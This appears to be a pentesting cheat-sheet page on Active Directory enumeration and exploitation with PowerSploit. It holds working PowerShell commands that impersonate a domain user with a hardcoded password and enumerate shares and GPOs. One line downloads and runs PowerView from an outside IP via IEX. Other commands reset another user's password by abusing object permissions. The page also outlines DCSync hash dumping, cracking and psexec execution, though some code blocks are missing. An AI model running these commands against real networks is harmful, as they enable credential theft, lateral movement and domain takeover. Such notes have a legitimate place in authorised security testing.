Domain Enumeration + Exploitation

PowerSploit

Impersonate Another Domain User

$cred = New-Object System.Management.Automation.PSCredential "BURMAT\John.Smith", $(ConvertTo-SecureString "Spring2020!" -AsPlainText -Force);

Find-DomainShare -ComputerName fs01.burmat.local -Credential $cred -ComputerDomain burmat.local -CheckShareAccess

Invoke-UserImpersonation -Credential $cred

# now we can read the directory impersonating another user if permissions exist:
dir \\fs01.burmat.local\Private```
### Enumerate GPO's
```powershell
"{7EA15487-7F5B-4CE3-C029-CEBE6FFE6D47}" | Get-DomainGPO

Reset Domain User Password

If you own the owner of another AD user object (WriteOwner, WriteDACL, GenericWrite, Owner, etc), you can reset the password with ease:

IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
$user = 'DOMAIN\owner_acct';
$pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force;
$creds = New-Object System.Management.Automation.PSCredential $user, $pass;
$newpass = ConvertTo-SecureString 'burmatw@sh3r3' -AsPlainText -Force;
Set-DomainUserPassword -Identity 'DOMAIN\vuln_user' -AccountPassword $newpass -Credential $creds;

You can also set yourself as owner:

Or you can do it using Impacket's "smbpasswd.py"

Add/Exploit DCSync Rights

If you have WriteDACL rights on a domain, you can give DCSync rights to an unprivileged domain user account:

And you can use these rights to dump the hashes from the domain:

from a meterpreter

using impacket secretsdump.py

You can then crack the collected hashes by using crackmapexec

Then you can execute codes using impacket-psexec

PreviousNTLMNextPowerShell Tricks

Last updated